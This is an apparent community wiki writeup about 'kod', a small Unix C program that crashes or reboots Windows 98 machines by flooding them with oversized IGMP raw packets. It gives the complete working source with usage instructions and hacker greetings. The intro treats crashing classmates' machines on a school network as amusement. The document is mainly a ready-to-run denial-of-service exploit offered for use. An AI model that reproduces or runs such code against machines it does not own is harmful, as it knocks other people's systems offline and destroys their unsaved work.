display | more...

kod is a rather amusing script for the *nix lusers among us. While being a tiny little C program, it really proves how terrible Windows 9x' security is.

kod sends a lot of packets to a machine, which responds with one of these three:

  1. It crashes the TCP/IP stack, showing a nice bluescreen
  2. It reboots (!)
  3. It shows no sign of hurt
This is a very common "tool" in heterogenous networks like the one we have at school.

Its brother, kox, does also do exciting stuff.

Its code looks like this:

/*
::: [stuph ] bug found by klepto / total rewrite on *nix platform by defile
::: [notes ] bluescreens windows users(98/98se) and kills tcp stack
::: [m$ bug] windows handles igmp badly and this is the result
::: [greets] amputee/nizda/nyt/ignitor/skyline/codelogic/ill`/conio/egotrip/TFreak/napster
::: [greets] dist(test monkey)/naz(you rule period.)/#havok/#irc_addict/#kgb/#eof/everyone
::: [action] ./kod <host> and BEWM!
::: [rant  ] there will be lots of rewrites to this.. just get our name right!
de omnibus dubitandum
*/

/* 
windows core dump output (*whee*)
An exception 0E has occurred at 0028:C14C9212 in VxD VIP(01) +
00006C72.  This was called from 0028:C183FF54 in VcD PPPMAC(04) +
000079BR.  It may be possible to continue normally(*not*).
*/

/*
There will be more bugs like this until bill "big moneybags" gates
puts more effort into making windows more stable instead of patching holes!! (eraZer)
*/

#include <stdio.h>
#include <netdb.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

size_t hits = 5;
unsigned short port = 100;

void usage (char *progname)
{
  printf("Usage: %s <host> -p port -t hits\n", progname);
  exit(1);
}

void parse_args (int argc, char *argv[], char **target)
{
 int y;

 *target = argv[1];
	
 if (argv[1][0] == '-') {
  printf ("Must specify a target.\n");
  exit (1);
 }
 for (y=2; y < argc; y++) {
  if (!strcmp(argv[y], "-p")) {
   y++;
   port = atoi (argv[y]);
  } else if (!strcmp(argv[y], "-t")) {
   y++;
   hits = atoi (argv[y]);
  }
 }	
}


int main (int argc, char *argv[])
{
 struct sockaddr_in	sin;
 struct hostent	*he;
 size_t maxpkt = 15000;
 char *target;
 char buf[15000];
 int sd;

 if (argc < 2) 
  usage (argv[0]);

 parse_args (argc, argv, &target);
 if ((he = gethostbyname (target)) == NULL) {
  herror (target);
  exit (1);
 }
 memcpy (&sin.sin_addr.s_addr, he->h_addr, he->h_length);

 sin.sin_family = AF_INET;
 sin.sin_port = htons (port);
	
 if ((sd = socket (AF_INET, SOCK_RAW, 2)) == -1) {
  perror ("error: socket()");
  exit (1);
 }

 if (-1 == connect (sd, (struct sockaddr *)&sin, sizeof (sin))) {
  perror ("error: connect()");
  close (sd);
  exit (1);
 }

 puts ("Determining max MSGSIZE");
 while (send (sd, buf, maxpkt, 0) == -1) {
  if (EMSGSIZE != errno) {
   perror ("error: send()");
   close (sd);
   exit (1);
  }
  maxpkt -= 1;
 }
 hits--;

 printf ("Max MSGSIZE is %d\n..%d bytes [%s:%d]..\n", maxpkt,
   maxpkt, target, port);
 while (hits--) {
  usleep (50000);
  if (send (sd, buf, maxpkt, 0) == -1) {
   perror ("error: send()");
   close (sd);
   exit (1);
  }
  printf ("..%d bytes [%s:%d]..\n", maxpkt, target, port);
 }

 sleep (1);
 close (sd);
 puts ("complete.");

 exit (0);
}

Log in or register to write something here or to contact authors.